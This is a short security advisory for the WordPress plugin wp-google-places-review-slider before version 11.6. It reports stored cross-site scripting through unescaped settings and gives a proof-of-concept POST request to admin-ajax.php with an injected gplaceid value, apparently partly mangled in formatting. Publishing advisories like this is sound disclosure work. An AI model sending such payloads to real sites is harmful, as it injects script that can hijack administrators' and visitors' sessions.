The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1 Host: example.com X-Requested-With: XMLHttpRequest Referer: http://example.com/wp-admin/admin.php?page=wp_google-googlecrawl Cookie: [admin+] Connection: close action=wpfbr_crawl_placeid&gplaceid;=“><”&_ajax_nonce=
CPE | Name | Operator | Version |
---|---|---|---|
wp-google-places-review-slider | lt | 11.6 |